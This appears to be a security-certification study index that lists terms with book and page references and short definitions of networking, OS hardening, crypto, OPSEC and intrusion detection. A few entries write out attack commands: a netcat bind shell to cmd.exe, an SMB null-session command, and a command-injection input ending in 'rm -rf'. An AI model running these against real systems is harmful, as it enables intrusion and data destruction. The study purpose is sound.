Multifactor Authentication                2   248   password,certificate,Token,one-Time Authen,third mechanism
multi-level screened network              3    54   allows limited access from a zone to a previous zone, colors,
Multi-Master replication / AD             5    32   change in AD database will be replicated to all other domain controller automatically
Multipartite Viruses                      2    24   can infect boot record as well as program file can spread across the network
mutt                                      6    10
mv <file name> <new file name>            6   216   move a file from one location to another or rename it.
MyDoom worm                               2    41   peer-to peer worm
MySql port                                3    55   TCP3306,web server connect to this port to query data
NAC (Network access control)              1    29   isolate systems intially connected in vlans until scanned
nachi worm                                3   159
NAP (Network acces protection)            5    15   check if users have the latest patches,recent virus updates,
NAP (network access points)               1     7   Isp provide internet access to the customers through NAP
Nasl (nessus attack scripting language)   3   134   Nessus attack scripting language, used for writing plugins
Nat                                       3    66   network address translation to address in rfc 1918
nat                                       6   178   2 builtin chains in which to place nat policy rules: pre-routing chain,post-routing chain
Natural ventilation                       1   226   moving air through a door
nbtstat -A ipaddress                      5   203   returns the local NetBIOS name table for that computer, name and code
nbtstat.exe                               5   283   NetBIOS related data
nc.exe -L -p 7890 -e cmd.exe              5   216   netcat run and listen to 7890 and connect an incoming session to new instance of cmd.exe
NDA - Non Disclosure Agreement            4   241   u cannot disclose sensitive information outside the company.
NDA (Non-Disclosure Agreement)            2    78   protects (sensitive info, confidentiality, both parties); legal doc must be clear and reviewed
need to know                              2   108   least privilege + more restricted by time
Need to know - OPSEC                      4   242   access available only when, what, where necessary, according to business requirements and with the Least Privilege concept
nessus client                             3   135   can run from different machines,control the scan process
nessus color codes                        3   142   red=critical,orange=moderate,yellow=moderate low,gray=low
nessus server                             3   135   run the actual scans and send results to a nessus client
net user guest $5&uuu /active:no /times             disable guest and set a random password
net.exe                                   5   283   can be used to show shared folders,drive mapping,account and group information,services
net.exe accounts                          5   311   lockout and password policy
net.exe share                             5   102   used in sharing
net.exe use                               5    55   map network drive
net.exe use \\target\IPC$ "" /user:""     5   169   to establish a null session
netBios                                   5   205   required for full backward compatibility with older operating systems
netbios - null user sessions              5   206
netBios code number                       5   203   ********2 pages********
netbios datagram service                  5   209   udp/138
netBios disabling                         5   205   NetBIOS is not related to null sessions
netBios name                              5   203   name and code number reveal the service running on the target,registry_Key=netbt
netbios name service                      5   209   tcp/udp/137
netbios session service                   5   209   tcp/139
netcat listener                           3    82
netdiag /test:testName /v                 5   282   run specific testName and show more data
netdiag.exe                               5   282   troubleshooting tool, 2000/XP/2003 only; variety of tests, dumps the output to the console
netdiag.exe /v                            5   282   run all tests available,show more data
netfilter                                 6   175   is the commercial name of Iptables
netranger                                 3   195   cisco ids
netsh.exe                                 5   218   manage windows firewall and network related services,mange ipsec
netsh.exe                                 5   282   like Cisco, int to interface; set machine ip allows you to execute commands remotely
netsh.exe advfirewall firewall set        5   218   rule /?, how to create a rule
netsh.exe advfirewall firewall show       5   218   rule name=all,dump the details of every rule
netsh.exe advfirewall show allprofi       5   218   allprofiles,summary of your profiles options(domain-private-public)
netsh.exe firewall show config            5   312   show windows firewall settings
netsh.exe ipsec dynamic                   5   221   see all ipsec configuration using netsh.exe ipsec dynamic add mmpolicy name=TempMMpolicy
netsh.exe set machine IpAddress           5   283   allows you to execute netsh commands remotely
netsh.exe winsock show catalog            5   312   get the winsock all api about network configuration
Netsky Worm                               2    31   W32,infected systems and their backup,systemrun slowly and shutdown
netstat                                6   67    summarizes TCP/IP network traffic; -a --> all active services or ports, -n --> display in numeric format (show IPs)
netstat                                6   199   identify running services and connections to each
netstat.exe                            5   283   show all listening ports
netstumbler                            3   146   wireless active scanner, retrieves: wireless channel, access point MAC, SSID, signal and noise level
network tap                            1    22   to see all traffic on a raw wire without having to reconfigure the switch
network adapter binding                5   201   a path of communication between network component and physical network adapter
network configuration tools            5   282   wmic.exe , netsh.exe , getmac.exe , ipconfig.exe , route.exe , net.exe , netstat.exe , nbtstat.exe
Network design objectives              1    31   separate servers, protect internal network, provide defense in depth, protect all systems
Network devices                        1    25   switch, hub, router, bridge, repeater
network IDS                            3   174   passive sensor; uses signatures, anomaly, application protocol analysis
network location types                 5   213   public,private,domain network
network location types domain          5   214   least restricted rules
network location types private         5   213   a trusted network that doesn't have domain controllers
network location types public          5   213   like airport most restricted rules
network profile                        5   213   is a categorization label assigned to a network adapter card and the network to which it is attached at the moment. When first connecting you will be prompted to choose
Network protocol                       1    41   to standardize the format, order, timing and meaning of communications
Network segments,sections              1    32   public ,semi-public,private
network taps                           3   188   solution for the spanning port; works also on fiber, no impact on performance, need a tap for each wire
Network-aware tools                    2    45   tools use signatures and behavior to examine network traffic
networking                             3    32   all connections in big endian
newgrp                                 6   45    login to a new group ( when create a file it's group will be that grp) -->newgrp grpname
NFS (Network file System)              6   96    provides transparent file access for clients to files and filesystems on a "server A"; file sharing implemented as an RPC service, UDP port 2049
NFS client                             6   97    mount <serverip>:<sharename> <mountpoint>; any attempt to look in the mount point will cause an RPC to the server and display content from the server
Nic auto-sensing                       1    23   the NIC automatically detects the cable type for proper communication
Nick Leeson and Barings Bank - OPSEC   4   243
Nids - active vulnerability            3   207   like vulnerability scanners used by NIDS
NIDS - Encrypted traffic               3   189   use anomaly analysis (increases false negatives)
Nids - passive fingerprinting          3   206   a technique to monitor network traffic and identify the hosts' operating systems
Nids - passive vulnerability           3   207   new method to identify vulnerable services and characteristics of applications
NIDS - Snort                           3   198
NIDS - TCPdump                         3   195
nids advantages                        3   184   audit for other controls, ...
nids challenges                        3   186   topology, encrypted traffic, quantity, quality, performance, very costly
NIDS cost                              3   193
Nids Development                       3   206
NIDS performance limits                3   191   bandwidth, decryption, lots of small packets decrease performance
NIDS - Signature Quality vs. Quantity  3   190
nids topology limitations              3   187   spanning ports, taps, affect switch performance
nikto                                  2   275   finds default web files; examines web server and CGI security; looks for misconfigurations; based on libwhisker; discovers vulnerabilities in sites
Nimda                                  2    41   worm; works to increase the number of infected systems
NIPS - how it works                    3   238
Nips - multi resolution filter         3   242   at the NIPS, simple tests are applied to traffic first, then more tests; this enhances system performance
nips challenges                        3   243   false positives drop legitimate traffic; more false negatives than IDS; latency; doesn't have an extensive rule-base for identifying attacks on the network, unlike NIDS
nips deployment                        3   240   before the firewall or behind the firewall, it depends
nips details                           3   241   inline causes a single point of failure for the network; uses custom ASICs to support high-speed analysis with complex inspection; uses data normalization & assembly techniques on aggregated traffic; hierarchical rule classification scheme used to classify and identify traffic
nips developments                      3   245   improved throughput & response time; automatic analysis/signature updates; environmental anomaly analysis; protocol scrubbing; rate limiting streams to apply QoS; enforcing organisation policy by dropping traffic of unauthorized apps
nips latency requirement               3   242   traffic analysis should be in the millisecond range
nips passive analysis                  3   244   to reduce false positives by identifying host OS, network architecture, and vulnerabilities on the network
nips protocol scrubbing                3   246   can be used to clean garbage from the traffic stream; sends RST to connections to tear them down
nips rate limiting                     3   246   to apply QoS mechanisms to network traffic
nips rules capabilities                3   242   packet header info, transport layer session info, app layer session info, payload string matching, app layer analysis, complex regular expression matching
nips security                          3   242   must be protected against compromise; configure the NIPS without an IP or MAC on the data interface
nips to enforce org policy             3   246   by dropping traffic from unauthorized applications like peer-to-peer applications
NIS (Network Information Service)      6   101   client-server model (provides central admin control of user accounts across the network); server contains data files called maps; client requests info from maps; master server has the true data file, which must be rebuilt and redistributed if changed
NIS+                                   6   101   like NIS, but provides more security
NLA (Network Level Authentication)     5   257   in RDP6; authenticates client and server before the session is created in memory; prevents DoS
NLB (Network Load Balancing)           5   230   built into RRAS to support load balancing
nlog tool                              3   117   provides a web-based interface to a database for analysis of data
nmap                                   3   122   queries open ports to attempt to learn which application is running on the port
nmap decoy scan                        3   115   uses different spoofed IP addresses to scan so it is hard to detect who the attacker is
nmap scan of stateless firewall        3    57   used to learn firewall rules: if an nmap port probe gets a RST/ACK, allow; if no response, deny
nmap scan types                        3   126   use hostnames, wildcards, ranges, CIDR notation, combined
No_magic_root                          6    62   in /etc/pam.d/system-auth in the pam_tally module; tells the system not to lock the root account, to prevent DoS against the root account
Non-Competition                        4   241   you cannot work for a competitor
Non-Compliance                         2    76   termination, reprimand
non-discoverable mode                  4   153   prevents Bluetooth devices from being discoverable. But devices in this mode should still respond to the PAGE_request from another Bluetooth device.
Non-Disclosure Agreement               2    78   protects (sensitive info, confidentiality, both parties); legal doc must be clear and reviewed
Non-Repudiation                        4    12   able to prove in a court of law that someone has sent the message
Non-Solicitation                       4   241   if you leave, don't take anyone with you
NOP                                    3    32   no-operation instruction; can be used to reach the payload
nop                                    3   176   no operation; used in buffer overflow attacks; 0x90 value
norton internet security               3   252   antivirus plus something, IPS; can report to a centralized management console
NPFS (Named Pipes File System)         5    88   inter-process communication across the network using SMB; only buffer areas (== file system) used to leverage SMB in interprocess communication; == acts as RAM with a shared folder
nslookup                                     1     76    a way to make forward lookups and reverse lookups
ntbackup.exe                                 5   69,71   built into Win XP/2003; backs up locked, encrypted, registry files; restore center in Vista
ntbackuprestore.exe                          5     72    to restore files backed up by ntbackup to Vista/2008/Seven
NTFS characteristics                         5     88    permissions, auditing, encryption, compression, transaction-oriented processing
NTFS complexity is a security vulnerability  5     92
NTFS compression                             5     89    by the NTFS driver itself, not a 3rd party; makes the file blue in color
NTFS DACL                                    5     90    a set of NTFS permissions on a file or a folder; sum total of the ACEs
NTFS explicit permissions                    5     91    solid-checked box ACE
NTFS inherited permissions                   5     91    gray-checked box ACE
NTFS least privilege                         5     95
NTFS nt file system                          5     88    maximum size is 16TB; transaction-oriented processing
NTFS permission inheritance                  5   90,91   not mandatory; only the root folder of a drive can have only explicit ACEs
NTFS scope of inheritance                    5     92
NTFS special permission box                  5     90    custom individual ACE that doesn't translate into a standard ACE
NTFS standard permission                     5     91    collection of one or more individual ACEs
NTFS-ACE                                     5     90    an individual permission access control entry
NTFS-unused exception                        5     88    boot from another system; recovery software on FAT
N-tier web application                       2    219    clustering services to increase load balancing and redundancy; more secure than 3-tier
ntlast                                       5    284    helps you scan event logs for things; comma-delimited output (easy to parse); Foundstone
NTLM                                         2    146
NTLM                                         5     38    NTLMv2 is not vulnerable; NTLM is the predecessor to Kerberos & still supported for compatibility; NTLM is used in workgroups & domains; NTLM uses the user's passphrase hash to compare it in the domain; NTLMv1 is vulnerable to sniff & crack (Cain) because it uses LAN Manager & NT/MD4; NTLMv2 is not vulnerable to cracking because it doesn't use LAN Manager; NTLM is supported by Windows NT & later
NTLM v1 LAN Manager disabling                5    172
NTLM V2                                      5    172    not vulnerable
NTLMv2                                       2    147    pass depends on domain name, server challenge, random hash
NTLMv2 enabling                              5    172
ntrights.exe                                 5    119    manage user rights from the command line
Null Algorithm                               4     95    it does nothing to the msg; used if you want to turn off encryption on IPsec
null session command                         5    169    net use \\target\ipc$ "" /user:""
null session disabling                       5    170    from GPO or registry by setting RestrictAnonymous to 2; null user session = SMB session without username or password
null user session                            5    169    SMB session to a server where username and password are blank
O_DIRECT                                     6     18    kernel flag in Linux that allows programmers to write directly to the device
Oakley                                       4     97    key exchange
obfuscation                                  2    242    making code more difficult to follow or understand
object_r                                     6    202    every object must have all three parts of a security context and is assigned by default to the role object_r
OCC                                          2    178
ocredit=$                                    6     60    minimum number of other characters is $; in /etc/pam.d/system-auth in the pam_cracklib argument
OFB - (Output feedback mode)                 4     22    like CBC but prevents the same plaintext from generating the same ciphertext by using an internal feedback mechanism
offensive OPSEC                              4    248
offensive OPSEC process                      4    254    1- Identify your target, 2- Collect open source or other info, 3- estimate (capacity, upcoming products, business vulnerability, approach to marketing, ...)
Offshore coding                              2    199    outsourcing SW
off-the-shelf library                        2    243    the ready-made library
old rain forest puppy rds exploit            5    242    on IIS4; can be prevented by removing the msadc folder from IIS
OllyDbg                                      5    125    a debugger tool in Windows; usable only when the user has the debug right
one - way function                           4     50    reveals the time and space required to execute intractable problems
one way encryption                           2    117    one-way hashing, one-way encryption
onerr=fail                                   6     62    in /etc/pam.d/system-auth in the pam_tally module; tells the system what to do when reaching the set number of failures = lock account
One-time pad Authentication                  2    249    something you have; list of passwords
one-time password                            2    142    each login uses a different password (token, challenge-response, S/Key)
open BSD                                     2    125    employs stronger password hashing
Open Source Collection - OPSEC                     4   257
open source collective - about me                  4   269
open source collective - company financials        4   266
open source collective - individual info           4   268   www.intelius.com
open source collective - product info              4   267   the big three credit reporting agencies
open source collective - info from other web site  4   265   www.fundrace.org, Google.com (business partners pages, phone listing, software and hardware used), www.monster.com, www.gao.gov (US General Accounting Office)
open ssh                                           6    14   encrypted remote access that replaces telnet and ftp; included in Mac by default
Ophcrack                                           2   134   tool: cracking tool
OPSEC - 5 steps                                    4   238
OPSEC - corporate information                      4   257   change in ownership, owner stock purchase or sale, employee stock option plans
OPSEC - management app. Operation security         4   236   OPSEC's focus is on establishing a process for identifying the weak links often exploited by adversaries; one size does not fit all: adjust and develop for your specific needs
OPSEC - protecting against OPSEC failure           4   253
OPSEC - The Pentagon Pizza Delivery Story          4   236   we need to keep the details private
OPSEC - three laws of defense                      4   237   1- Know the threat, 2- Know what to protect, 3- if you fail in the first two, the enemy wins.
OPSEC - weekly assessment cycle                    4   238   five steps [consideration]
OPSEC - Extract Knowledge                          4   250
OPSEC - mail example                               4   248
OPSEC - putting it all together                    4   243
OPSEC - sensitive information                      4   245   mark sensitive information by level; must enforce Mandatory Security Policy.
optical smoke sensors                        1   223   light beam and detecting plate when the smoke particles obscure the detector will alert
OR function                                  4    16
organizational unit                          5   114   container in active directory contain users,computers.
Organizational unit GPO                      5   159   linked only to particular OU
OS command injection                         2   258   command on the input form ex kh;rm -rf
OS command injection defense                 2   259   avoid making sys call within application tier,remove malicious char or define valid char
os finger printing                           3   129   nmap signature to identify different os.
OS overview                                  6    25   kernel, shell, hardware
OSI                                          1    43
OSI vs TCP/IP                                1    45
out-of-band Authentication                   2   249   SMS password
OWA Worm                                     5   242   Outlook Web Access worm; can be prevented by removing or renaming the IIS exchange folder
packet sniffer usage                         1   135   monitor, gather, analyze, debug, detect, gain, filter
PAGEFILE.SYS                                 5   132
Paging files                                 5   131
PAM (pluggable authentication modules)       6    58   system libraries that handle Linux authentication; originally invented by Sun
PAM config files                             6    58   in /etc/pam.d; common PAM file format: type --> PAM management group; control --> action if PAM auth fails; module-path, module-argument --> specify the name and path of the module in use (within /lib/security) and what arguments should be passed into it
PAM management groups                        6    58   handle specific types of authentication requests --> Auth, Password, Session, Account
pam_cracklib                                 6    60   PAM module that checks the password against dictionary words to make an assessment, plus other constraints; in /etc/pam.d/system-auth
pam_tally                                    6    62   /etc/pam.d/system-auth; PAM module used to count failed logins
pam_unix                                     6    61   remember old passwords module, to restrict reuse of previous passwords; also in /etc/pam.d/system-auth
PAN (personal area network)                  1     7   usually wireless; range <= 10 m; two or more devices; same party or different parties
panic button                                 1   244   detective control; silent alarm so as not to inform the intruder
PAP (Password Authentication Protocol)       2   113   weak; sends the password in clear text; the user can hash it before sending but it is still weak
parallel modem option                        3   155   in war dialing, allows you to scan more numbers in a shorter time
Parasitic Malware                    2    21   must be attached to another program (needs a container)
Paros                                2   232   tool that can edit the session cookie
passwd aging                         6    55   by 2 files: /etc/login.defs and /etc/default/useradd
passwd file fields                   6    52   7 fields
passwd -l                            6    62   lock account
passwd -u                            6    62   unlock account
password assessment                  2   122   dictionary attack, brute force, hybrid, precomputation brute force attack (rainbow table)
password cracking                    2   119   offline process to guess passwords given password file info
password cracking - methods          2   122   dictionary attack, brute force, hybrid, precomputation brute force attack (rainbow table)
password enforce stronger (Linux)    6    60   /etc/pam.d/system-auth & use this module: pam_cracklib
password policy - Enforce strong     2   138   account lock, complexity, user can't reuse last 5 passwords, password change interval < time to crack
password policy - Enforce strong     2   139   account lock, complexity, user can't reuse last 5 passwords, password change interval < time to crack
password storage                     2   119
password Strength                    2   120   quality of algorithm, key length, CPU cycles, character set supported, password length
Pat                                  3    69   translating traffic from multiple internal sources to a single external address
Patch Management                     2    45
patch management 3rd party           5    66   sites: shavlik.com, bigfix.com, ecora.com, gfi.com, patchlink.com
patch - new patches impact?          6   159   1- app may stop or have unexpected behavior, so test the patch first on a non-production system; 2- some patches need a reboot; test patches on non-production systems before distributing the patches widely
patches - how to find new patches    6   160   1- Automated updates, 2- Vendor Web/FTP site, 3- Mailing list
patching - why?                      6   158   1- Every day new vulnerabilities; 2- Vendors release patches to fix these vulnerabilities; 3- un-patched systems are still a major reason for compromised systems
patching systems                     3    19   Mitnick; timely patching; before or after the exploit
PCI (Payment card industry)          2   178   merchants
PDC                                  5    32   primary domain controller; can modify the database
Perception management                2   197
peering points                       1     7   ISPs provide connectivity to each other through these points
Peer-to-peer networking              2    41
pen testing                          3   155   used to determine the validity of identified vulnerabilities
pen testing techniques               3   157   war dialing, war driving, sniffing, eavesdropping, dumpster diving, social engineering
Penalties                            2    76   termination, reprimand
per_user                             6    62   in /etc/pam.d/system-auth in the pam_tally module; keeps a count for each individual user
Performance monitoring               2   271   CPU, memory utilization, latency, throughput
Permission Schema                    5    92
Permutation                          4    21   also called transposition; changes the character's position, not the character itself
persistent tier                      2   218   DB, SQL, Oracle, MySQL
Persistent Cookie                    2   232   browser stores them in a txt file on the hard disk and they remain when the browser exits; have an expiration date
personal firewall                    3    64   software residing on each computer
previous version tab in Vista/later  5    77   Windows restore includes data files and latest changes that can be restored
PGP - as Web of trust                      4   132   to use it like the PKI
PGP - certificate's fingerprint            4   133   used to trust the integrity of this certificate
PGP - history                              4   104
PGP - On the fly encryption                4   106   hard disk encryption; files are encrypted on the disk and decrypted to be read
PGP - Private passphrase                   4   108   most critical part of key generation; password-protect your stored private key
PGP - protects emails                      4   104   PGP provides confidentiality through encryption, integrity & source identification through digital signatures
PGP - Trust Depth Level                    4   132   to limit how much of this web you trust
PGP - Trust establishment                  4   133   trusting a certificate is not the same as trusting a person
PGP - encryption                           4   105
PGP - encryption & digital signature       4   107   can be used to digitally sign a message; uses SHA-1 (1024, 2048 min key) to generate the digest, & uses its private key to encrypt it; the receiver would use the sender's public key to decrypt the digest and validate it
Phishing Filter                            5   187   compares the URL against a list of known phishing sites & malware download URLs
Phishy Pheatures                           5   187
phone sweep                                3   104   commercial war dialer; scans a range looking for modems with auto answer
physical topology                          1     8   how the network is wired together through geometric shapes; how the network is actually connected
physical vs. logical topology              1    10   they are independent of each other
physical attacks                           3    30   someone has physical access, can shut down
physical security - managing               1   246   encryption, guards, signs, mantraps, shred everything, inspect packages to know what is leaving your organization
Physical security - Objective              1   213
piggybacking                               2    41
bilge pump                                 1   227   corrective control for water/flood, to remove water
PIN - Personal Identifier Number           4   151   used in Bluetooth to authenticate devices together; entered manually on each device
PIN brute force                            4   152   a 4-digit PIN could be brute forced in 63 msec using a Pentium 4 3GHz system
ping                                       1   122   local LANs < 10 ms; WAN and internet > 200-300 ms
ping scan                                  3   127   tells you which machines are up
PKI                                        4   115   allows users to exchange encrypted information over a public network; hierarchical infrastructure system used to create digital certificates
PKI - other uses                           4   131   NAC, NAP, code & driver, general user authn., wireless authen., IPsec & VPN authen., digital signature
PKI - biometric words                      4   133   PGP translates the hexadecimal digits into twenty biometric words that are easy to pronounce, to be validated
PKI - Certification life cycle             4   120
PKI - Disk Encryption                      4   130   another use of PKI is to create certificates to be used for disk encryption
PKI - Signature & certificate revocation   4   133
PKI - Verisign                             4   115   a certification authority
PKI problems                            4   135   incomplete standards; certification of CAs (directly affects how secure the entire PKI based upon them is); cross-certification between CAs; user education or perception; lack of critical mass
PKI servers types                       4   118   Root CA, Intermediate CA, Issuing CA
PKI SSL crypto                          4   128   SSL Steps from client to server
PKI SSL handshake                       4   128   SSL Steps from client to server
POC                                     2    80   point of contact
point to point tunneling protocol PPTP  5   226   no IPsec; no NAT problem; PPTPv1 vulnerable; use PPTPv2
policy - Baseline document              2    59
policy - Convincing the org by policy   2    54   what make their job easier,executive:language of money
Policy - Creating                       2    73
policy - definition                     2    61   a directive that indicates a decision to follow toward an objective
policy - Scope/Applicability            2    75   who apply policy for and what systems are applicable
Policy categories                       2    71   Program Policy, Issue-specific Policies, System Specific Policy
Policy Creating - Issue                 2    74   what the problem you try to solve
policy statement must                   2    70   SMART+5Ws(What,Who,Where,When,Why)
policy table of content                 2    68
policy vs. Procedure                    2    60   policy(who,what,why) procedure(how,where,when)
Pollard rho-method                      4    70   the best-known solution for ECDLP; fully exponential
POP (point of presence)                 1     7   ISPs provide internet access to customers through the POP
port Mapper                             6   104   when an RPC service starts on a computer it registers with the portmapper service, so portmapper tracks all RPCs running on the system; uses UDP port 111 and TCP port 111; it's a registrar that keeps track of which RPC programs are using which ports
port Mapper                             6   104   services register with the PortMapper and clients query it; PortMapper can provide info on all of these RPCs to remote computers that desire their service
port scanning                           3   121   scan 0-65,535 twice: once for UDP and once for TCP
portable fire extinguisher              1   223   combustible (paper, wood): type A, triangle (Δ) - liquids: type B, square (□) - electrical: type C, circle (○)
Portal throughput                       2   144   amount of time it takes to authen using Biometric
POS (point of sale)                     4   147   retail chains are migrating toward wireless networks to extend their point-of-sale (POS) solutions
POST                                    2   228   does not append any data to the URL; it appends it to the HTTP header, which may be encrypted
postfix                                 6   175   is a Linux proxy application used for e-mail, & can coexist with Iptables.
post-routing chain                      6   178   NATs packets when the source address of the packet needs to be changed
Posture Issues Example                  2    57
power and cooling issues                1   230   average 65°F or 18°C; redundancy; scalable solutions; humidity = 45%
power quality issue - blackout          1   231   power failure (sustained)
power quality issue - brownout          1   231   voltage drop (sustained)
power quality issue - fault             1   231   power failure (short)
power quality issue - sag               1   231   voltage drop (short)
power quality issue - spike             1   231   voltage increase (short)
power quality issue - surge             1   231   voltage increase (sustained)
power Shell                        5    15   .NET-integrated framework for executing commands and scripts
power shell commands               5   291   pipe symbol |; list local events; show the last 20 events; show only warning and error
power users group                   5    96   no longer needed,to provide elevated powers to some user without being admins
Power Users group                   5    96
powershell                          5   290   cmd replacement,perl-like,win server2008,7 by default,available for xp-sp2
powershell                          5   290   create com files,object oriented
PPTPv1                              5   227   vulnerable ,ms_chapv1
pptpv2                              5   227   use 128-bit rc4 encryption,ms_chapv2
pre mac OSX                        6    12   not considered high-power and not quite ready for serious use; used for graphical work and desktop publishing; had a noisy network protocol; used for desktop work, not server work
Pre-computation                    2   147
Pre-computation Attack             2   124   precompute hashes, store the result in a DB; rainbow table
Pre-computation attack - fighting  2   147   use salts, server challenge, randomize final hash, password dependent on session, domain, user name
pre-routing chain                  6   178   NATs packets when the destination address of the packet needs to be changed
presentation                       1    44   handles the format and compression: jpeg, mpeg...
presentation tier                  2   218   web server (IIS, Apache); provides I/P and O/P to users; under constant attack
previous version how? steps        5    79   right click folder > Properties > Previous Versions tab
perimeter assessment               1   234   area geography, traffic patterns, activities of other buildings, area crime statistics
perimeter definition               1   234   enclosed space that has been labeled a restricted area
perimeter dimensions               1   235   floor: raised floors, in-floor ventilation; wall: doors, windows
Principle of least privilege       5    95   grant the least permissions to users
Prioritizing CIA                   2    10   C = pharmaceuticals, I = banks & financial institutions, A = e-commerce
private address                     1    63   10.0.0.0/8,172.16.0.0-172.31.0.0/12,192.168.0.0/16,127.0.0.0/8 loopback
private address space               3    67   10.0.0.0-10.x.x.x , 172.16.0.0-172.31.x.x , 192.168.0.0-192.168.x.x
Private circuit (network)           4    84   pro:dedicated lines, Cons:expensive
Private key                         4    29   If I encrypted the message with my private the others could decrpted the message with my public key
Procedure - definition              2    62   Step-by-step used for operation,Mandatory
Procedure vs. policy                2    60   policy(who,what,why) procedure(how,where,when)
process explorer                    5   284   a taskManager replacement,sysinternals
process table                       3    62   proxy firewall use them to keep connection straight
Program Infectors                   2    22   attach itself to existing prog (.com,.exe)
Program Policy                      2    71   high level,provide direction for compliance with industry standards such as ISO,QS,BS,AS
protect pass crack                  2   137   strong policy,shadow,one-time,passwd+,Fighting pre-comp attack,protect enc pass
Protected Enclaves (‫)جيوب‬           2    16   Segmenting ur network,many Vlan,VPNs, firewalls
protocol - Linux                    6   107   any protocol in /etc/protocol
                                              set of protocols needed together for communication,each layer receive a serrvice form the lower layer and provide
protocol stack                      1   40
                                              a service to the upper
proxy firewall                      3    62   slowest,inconvient to mange,traffic regenrated,painful in large organization
ps                                  6   199   monitor you running processes
ps (process status)                      6   64,65   ps command, and it is a detective control
pseudo flaw                              3    28     something that looks vulnerable but acts as an alarm or triggers actions if an intruder attempts to exploit the flaw; not a honeypot or honeynet
psExec                                   5   284     remote execution of commands, Sysinternals
psexec.exe                               5    55     execute a process on a remote machine without going to the PC, like telnet; executes batch
psinfo                                   5   284     shows computer configuration, service packs, patches, software
psloglist.exe                            5   328
Public key                               4    29
Public-key crypto - Who invented it ?    4    29
pwd                                      6   210     command to print the working directory.
quadratic time                           4    51     O(n^2)
qualitative risk analysis                3   271     easier, identifies high risk areas, [low, medium, high] risk categorization
quantitative risk analysis               3   271     far more valuable as a business decision tool, works with metrics, dollars, monetary loss value.
QUERY_STRING                             2   228
QWinApt                                  6   166     synaptic/QWinAPT GUI tools use apt to install, upgrade, remove packages (Debian)
R^3                                      3    96     reconnaissance, resource protection, ROI
race conditions                          3    38     exploiting the time difference between the security control check and the applied service
RADIUS (Remote Authen dial-in usr svc)   2   114     UDP based
Rainbow table                            2   124     hashed password
Rainbow table                            2   133     pre-computed hashes, cryptanalytic
rainbowCrack                             5   171     software to crack password hashes; NTLMv2 not vulnerable to Cain + RainbowCrack
Ramen                                    2    28     web defacement & mails passwords to the attacker; RedHat OS, uses a hole in file & printer sharing services
ramen worm                               6   185     saves its code in /usr/src/.poop on the infected Linux
randomize_hosts                          3   126     a little more difficult to detect, random selection of the IP range
raw tcp sockets                          5     7     not permitted to send user data; only UDP sockets are allowed
RBAC (Role-based Access control)         2   109     assigns users to roles or groups based on their function
RCMD and REXD                            6   105     RPC service that allows execution of a program or part of a program remotely
RDP (Remote Desktop Protocol)            5    15     gives the user the GUI of another remote host; in Server 2008 enhanced features
RDP 6 client                             5   256     NLA support, built in to Server 2008 and later, download for XP, 2003
RDP 7 client                             5   258     performance enhanced, not security
RDP best practices                       5   259     NLA, 128-bit encryption minimum, TLS, smart card, block access to local drives
RDP citrix                               5   260     enhanced management capabilities in the RDP client, thin client for Linux, Solaris, Mac
RDP Encryption levels fips compliant     5   256     RC4 is not permitted
RDP encryption levels server2003         5   256     low - client compatible - high - FIPS compliant
RDP(Remote Desktop Protocol )            5   256     terminal services and remote desktop use RDP on TCP port 3389
RDS ( Remote Desktop Services )          5   252     graphical remote control of virtual desktops hidden in the RAM of the RDS server
RDS (Remote Desktop Services) license    5   253     remote administration, application server
Real evidence                            2   187     tangible item: seized PC, USB drive, printout
REBAC(ruleset-based Access control)      2   110     action based on rules for a user (subject) operating on data (object)
RedFang                               4   152   tool to attack Bluetooth; can circumvent the security of Bluetooth networks.
redhat benchmark                      6   188   requires Sun Java runtime env. (specifically version 1.5 (5.0)); don't get anything older or newer
REG.exe                               5   108   cmd tool to edit, view the registry
REGedit.exe                           5   108   GUI to edit, view the registry
registration spoofing                 1    78   social engineering attack; attacker convinces the registrar that the domain exists on another DNS
registry                              5   108   DB of configuration settings for all computer hardware, applications…
Registry "allowedpaths"               5   110   a subkey in winreg defining the registry paths that are readable
Registry "winreg"                     5   109   key to control sharing permissions of the registry, default values see book == used to put share permissions on the registry
Registry key permissions              5   109   against local and remote access to the registry, share permissions, WINREG key
Registry keys                         5   108   yellow folders holding files called values
registry permissions                  5   111   regedit > highlight key > edit > permissions; use a security template or GPO
Registry values                       5   108   file-looking objects containing the type (REG_DWORD) and the data it is set to
Registry vs. Active directory              33
REGSVC.exe                            5   109   service that allows remote connections to the registry; to disable remote access remove this service
Regulation                            2   178   SOX,GLBA,HIPAA,PCI
relay                                 3    74   when an attacker breaks into a site and uses it to attack other sites
remember=$                            6    61   this value is the number of old passwords remembered, in /etc/pam.d/system-auth in the pam_unix argument
remote assistance                     5   255
remote desktop                        5   253   terminal services on XP/Vista; prevents users with blank passwords from logging on
Remote Desktop Services Application   5    15   ability to host individual applications on an RDP server instead of entire desktops
remote desktop services web access    5   255   ActiveX version of the remote desktop client on Server 2008 R2 and later
remote login service, rlogin          3    11   port 513 TCP, rlogin command, allows communicating with a remote machine
remote maintenance                    3    36   allows administrators into a system to troubleshoot a problem remotely, GoToMyPC
Remote registry service               5   109   REGSVC.exe, service that allows remote connections to the registry
remote server administration tools    5   270   Vista and later, allows an administrator to sit at a workstation and manage Active Directory
Replay attack                         2   113
Report Unsafe                         5   187
require encryption                    5   215   mutual authentication and encryption
research honeypots                    3    74   weak, unpatched, vulnerable host trap; tactics, motives, tools
resource separation                   1    31   one of the elements of defense in depth (separate DNS, mail, web servers)
response (corrective control)         3    99   the countermeasures they use to fight threats once they are found
restore point                         5    76   created automatically at a variety of times
Restore Point from calender           5    78
restrict use of previous passwords    6    61   password enforcing (pam_cracklib argument) and restricting use of previous passwords (pam_unix argument) & create /etc/security/opasswd
restricted area                       1   234   measures must be implemented to avoid unwanted access, detect if unwanted access occurs, and a procedure if a breach happens
restricted area - escort                        1   237   employee escort: disable all his access, take badge, parking decal, escorted by a guard or at least two managers
Restricted Sites Zone                           5   186   list of URLs for sites that you don't trust
return address                                  3    32   the point at which the inserted payload is able to control the CPU or crash the program
reverse engineering                             2   116   it is used for detecting the algorithm used to generate an SW instance
Reversible encryption                           2   116   for encryption, not recommended for passwords
REXD and RCMD                                   6   105   RPC service that allows execution of a program or part of a program remotely
rf-barriers                                     3   151   metal screening inside exterior walls to reduce wireless signals
RFC 1918                                        3    67   private range
Rijndael cipher - AES @ ZigBee                  4   161   also provides integrity protection that prevents encrypted traffic from being altered during transmission
ring physical topology                          1     9   each machine has 2 network connections, bi-directional communication
ring physical topology disadvantage             1     9   confidentiality is not guaranteed; if one cable drops the loop will have a problem
Risk                                            2     7   risk = threat * vulnerabilities
risk                                            3   265   equals vulnerability * threat
